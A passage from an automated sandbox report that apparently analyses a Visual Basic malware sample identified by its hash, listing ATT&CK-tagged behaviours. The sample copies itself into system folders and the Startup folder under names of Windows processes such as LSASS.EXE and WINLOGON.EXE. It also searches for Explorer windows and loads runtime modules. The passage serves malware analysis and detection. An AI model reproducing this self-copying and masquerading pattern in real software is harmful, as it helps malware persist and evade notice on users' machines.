\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" searching for window \"Folder Options\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" searching for window \"Local Settings\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" searching for class \"ExploreWClass\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" searching for class \"CabinetWClass\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" searching for class \"RebarWindow32\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" searching for class \"ComboBoxEx32\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" searching for class \"ComboBox\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" searching for class \"Edit\"\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe to new location C:\\4k51k4.exe (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe to new location %WINDIR%\\system32\\MrHelloween.scr (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.pif to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.pif to new location C:\\4k51k4.exe (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.pif to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.pif to new location %WINDIR%\\system32\\MrHelloween.scr (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.pif to new location %WINDIR%\\system32\\IExplorer.exe (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.pif to new location %USERPROFILE%\\Start Menu\\Programs\\Startup\\Empty.pif (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.pif to new location %APPDATA%\\WINDOWS\\WINLOGON.EXE (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.pif to new location %APPDATA%\\WINDOWS\\CSRSS.EXE (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.pif to new location %APPDATA%\\WINDOWS\\SERVICES.EXE (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.pif to new location %APPDATA%\\WINDOWS\\LSASS.EXE (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.pif to new location %APPDATA%\\WINDOWS\\SMSS.EXE (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.scr to new location %WINDIR%\\4k51k4.exe (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.scr to new location C:\\4k51k4.exe (UID: 00000000-00005712)\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" called \"CopyFileA\" to copy C:\\\\765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.scr to new location %WINDIR%\\system32\\shell.exe (UID: 00000000-00005712)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\msvbvm60.dll\" at 72940000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d30000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"KERNEL32\" at base 770f0000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b9b0000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"CRYPTSP.DLL\" at base 75130000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ec0000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"ADVAPI32.DLL\" at base 775b0000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"CRYPTBASE.DLL\" at base 75620000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"DWMAPI.DLL\" at base 74040000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"KERNEL32.DLL\" at base 770f0000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"SHELL32.DLL\" at base 76120000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"OLE32.DLL\" at base 77320000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"COMCTL32.DLL\" at base 74620000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"OLEAUT32.DLL\" at base 77780000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 770f0000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"SETUPAPI.DLL\" at base 75eb0000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"RPCRT4.DLL\" at base 77480000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"CLBCATQ.DLL\" at base 77020000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744b0000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"NTMARTA.DLL\" at base 74b90000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"USER32\" at base 76050000\n \"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755d0000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d30000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4k51k4.exe\" loaded module \"KERNEL32\" at base 770f0000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"4k51k4.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b9b0000\n \"4k51k4.exe\" loaded module \"CRYPTSP.DLL\" at base 75130000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ec0000\n \"4k51k4.exe\" loaded module \"ADVAPI32.DLL\" at base 775b0000\n \"4k51k4.exe\" loaded module \"CRYPTBASE.DLL\" at base 75620000\n \"4k51k4.exe\" loaded module \"DWMAPI.DLL\" at base 74040000\n \"4k51k4.exe\" loaded module \"KERNEL32.DLL\" at base 770f0000\n \"4k51k4.exe\" loaded module \"SHELL32.DLL\" at base 76120000\n \"4k51k4.exe\" loaded module \"OLE32.DLL\" at base 77320000\n \"4k51k4.exe\" loaded module \"COMCTL32.DLL\" at base 74620000\n \"4k51k4.exe\" loaded module \"OLEAUT32.DLL\" at base 77780000\n \"4k51k4.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 770f0000\n \"4k51k4.exe\" loaded module \"SETUPAPI.DLL\" at base 75eb0000\n \"4k51k4.exe\" loaded module \"CLBCATQ.DLL\" at base 77020000\n \"4k51k4.exe\" loaded module \"RPCRT4.DLL\" at base 77480000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744b0000\n \"4k51k4.exe\" loaded module \"NTMARTA.DLL\" at base 74b90000\n \"4k51k4.exe\" loaded module \"USER32\" at base 76050000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755d0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d30000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"IExplorer.exe\" loaded module \"KERNEL32\" at base 770f0000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74290000\n \"IExplorer.exe\" loaded module \"OLEAUT32.DLL\" at base 77780000\n \"IExplorer.exe\" loaded module \"SXS.DLL\" at base 75630000\n \"IExplorer.exe\" loaded module \"CRYPTSP.DLL\" at base 75130000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ec0000\n \"IExplorer.exe\" loaded module \"ADVAPI32.DLL\" at base 775b0000\n \"IExplorer.exe\" loaded module \"CRYPTBASE.DLL\" at base 75620000\n \"IExplorer.exe\" loaded module \"DWMAPI.DLL\" at base 74040000\n \"IExplorer.exe\" loaded module \"KERNEL32.DLL\" at base 770f0000\n \"IExplorer.exe\" loaded module \"SHELL32.DLL\" at base 76120000\n \"IExplorer.exe\" loaded module \"OLE32.DLL\" at base 77320000\n \"IExplorer.exe\" loaded module \"COMCTL32.DLL\" at base 74620000\n \"IExplorer.exe\" loaded module \"CLBCATQ.DLL\" at base 77020000\n \"IExplorer.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 770f0000\n \"IExplorer.exe\" loaded module \"SETUPAPI.DLL\" at base 75eb0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744b0000\n \"IExplorer.exe\" loaded module \"RPCRT4.DLL\" at base 77480000\n \"IExplorer.exe\" loaded module \"NTMARTA.DLL\" at base 74b90000\n \"IExplorer.exe\" loaded module \"USER32\" at base 76050000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755d0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d30000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"KERNEL32\" at base 770f0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b9b0000\n \"WINLOGON.EXE\" loaded module \"CRYPTSP.DLL\" at base 75130000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ec0000\n \"WINLOGON.EXE\" loaded module \"ADVAPI32.DLL\" at base 775b0000\n \"WINLOGON.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75620000\n \"WINLOGON.EXE\" loaded module \"KERNEL32.DLL\" at base 770f0000\n \"WINLOGON.EXE\" loaded module \"SHELL32.DLL\" at base 76120000\n \"WINLOGON.EXE\" loaded module \"OLE32.DLL\" at base 77320000\n \"WINLOGON.EXE\" loaded module \"COMCTL32.DLL\" at base 74620000\n \"WINLOGON.EXE\" loaded module \"OLEAUT32.DLL\" at base 77780000\n \"WINLOGON.EXE\" loaded module \"CLBCATQ.DLL\" at base 77020000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744b0000\n \"WINLOGON.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 770f0000\n \"WINLOGON.EXE\" loaded module \"SETUPAPI.DLL\" at base 75eb0000\n \"WINLOGON.EXE\" loaded module \"RPCRT4.DLL\" at base 77480000\n \"WINLOGON.EXE\" loaded module \"NTMARTA.DLL\" at base 74b90000\n \"WINLOGON.EXE\" loaded module \"USER32\" at base 76050000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755d0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74290000\n \"CSRSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 77780000\n \"CSRSS.EXE\" loaded module \"SXS.DLL\" at base 75630000\n \"CSRSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75130000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ec0000\n \"CSRSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 775b0000\n \"CSRSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75620000\n \"CSRSS.EXE\" loaded module \"DWMAPI.DLL\" at base 74040000\n \"CSRSS.EXE\" loaded module \"KERNEL32.DLL\" at base 770f0000\n \"CSRSS.EXE\" loaded module \"SHELL32.DLL\" at base 76120000\n \"CSRSS.EXE\" loaded module \"OLE32.DLL\" at base 77320000\n \"CSRSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74620000\n \"CSRSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 77020000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 770f0000\n \"CSRSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 75eb0000\n \"CSRSS.EXE\" loaded module \"RPCRT4.DLL\" at base 77480000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744b0000\n \"CSRSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74b90000\n \"CSRSS.EXE\" loaded module \"USER32\" at base 76050000\n \"CSRSS.EXE\" loaded module \"KERNEL32\" at base 770f0000\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755d0000\n \"4k51k4.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74290000\n \"4k51k4.exe\" loaded module \"SXS.DLL\" at base 75630000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d30000\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"CSRSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"CSRSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b9b0000\n \"WINLOGON.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74290000\n \"WINLOGON.EXE\" loaded module \"SXS.DLL\" at base 75630000\n \"WINLOGON.EXE\" loaded module \"DWMAPI.DLL\" at base 74040000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d30000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SERVICES.EXE\" loaded module \"KERNEL32\" at base 770f0000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b9b0000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74290000\n \"SERVICES.EXE\" loaded module \"OLEAUT32.DLL\" at base 77780000\n \"SERVICES.EXE\" loaded module \"SXS.DLL\" at base 75630000\n \"SERVICES.EXE\" loaded module \"CRYPTSP.DLL\" at base 75130000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ec0000\n \"SERVICES.EXE\" loaded module \"ADVAPI32.DLL\" at base 775b0000\n \"SERVICES.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75620000\n \"SERVICES.EXE\" loaded module \"KERNEL32.DLL\" at base 770f0000\n \"SERVICES.EXE\" loaded module \"SHELL32.DLL\" at base 76120000\n \"SERVICES.EXE\" loaded module \"OLE32.DLL\" at base 77320000\n \"SERVICES.EXE\" loaded module \"COMCTL32.DLL\" at base 74620000\n \"SERVICES.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 770f0000\n \"SERVICES.EXE\" loaded module \"SETUPAPI.DLL\" at base 75eb0000\n \"SERVICES.EXE\" loaded module \"RPCRT4.DLL\" at base 77480000\n \"SERVICES.EXE\" loaded module \"CLBCATQ.DLL\" at base 77020000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744b0000\n \"SERVICES.EXE\" loaded module \"NTMARTA.DLL\" at base 74b90000\n \"SERVICES.EXE\" loaded module \"USER32\" at base 76050000\n \"SERVICES.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755d0000\n \"IExplorer.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b9b0000\n \"LSASS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75130000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ec0000\n \"LSASS.EXE\" loaded module \"ADVAPI32.DLL\" at base 775b0000\n \"LSASS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75620000\n \"LSASS.EXE\" loaded module \"KERNEL32.DLL\" at base 770f0000\n \"LSASS.EXE\" loaded module \"SHELL32.DLL\" at base 76120000\n \"LSASS.EXE\" loaded module \"OLE32.DLL\" at base 77320000\n \"LSASS.EXE\" loaded module \"COMCTL32.DLL\" at base 74620000\n \"LSASS.EXE\" loaded module \"OLEAUT32.DLL\" at base 77780000\n \"LSASS.EXE\" loaded module \"CLBCATQ.DLL\" at base 77020000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 770f0000\n \"LSASS.EXE\" loaded module \"SETUPAPI.DLL\" at base 75eb0000\n \"LSASS.EXE\" loaded module \"RPCRT4.DLL\" at base 77480000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744b0000\n \"LSASS.EXE\" loaded module \"NTMARTA.DLL\" at base 74b90000\n \"LSASS.EXE\" loaded module \"USER32\" at base 76050000\n \"LSASS.EXE\" loaded module \"KERNEL32\" at base 770f0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755d0000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d30000\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"LSASS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"LSASS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b9b0000\n \"LSASS.EXE\" loaded module \"SXS.DLL\" at base 75630000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d30000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"SMSS.EXE\" loaded module \"KERNEL32\" at base 770f0000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"SMSS.EXE\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b9b0000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74290000\n \"SMSS.EXE\" loaded module \"OLEAUT32.DLL\" at base 77780000\n \"SMSS.EXE\" loaded module \"SXS.DLL\" at base 75630000\n \"SMSS.EXE\" loaded module \"CRYPTSP.DLL\" at base 75130000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ec0000\n \"SMSS.EXE\" loaded module \"ADVAPI32.DLL\" at base 775b0000\n \"SMSS.EXE\" loaded module \"CRYPTBASE.DLL\" at base 75620000\n \"SMSS.EXE\" loaded module \"DWMAPI.DLL\" at base 74040000\n \"SMSS.EXE\" loaded module \"KERNEL32.DLL\" at base 770f0000\n \"SMSS.EXE\" loaded module \"SHELL32.DLL\" at base 76120000\n \"SMSS.EXE\" loaded module \"OLE32.DLL\" at base 77320000\n \"SMSS.EXE\" loaded module \"COMCTL32.DLL\" at base 74620000\n \"SMSS.EXE\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 770f0000\n \"SMSS.EXE\" loaded module \"SETUPAPI.DLL\" at base 75eb0000\n \"SMSS.EXE\" loaded module \"RPCRT4.DLL\" at base 77480000\n \"SMSS.EXE\" loaded module \"CLBCATQ.DLL\" at base 77020000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 744b0000\n \"SMSS.EXE\" loaded module \"NTMARTA.DLL\" at base 74b90000\n \"SMSS.EXE\" loaded module \"USER32\" at base 76050000\n \"SMSS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 755d0000\n \"LSASS.EXE\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74290000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"765b59faeb593249379572fbce8657ff6b4bd19e3844f601b1c3f1e79fe03b38\" has flags like IMAGE_FILE_32BIT_MACHINE\n 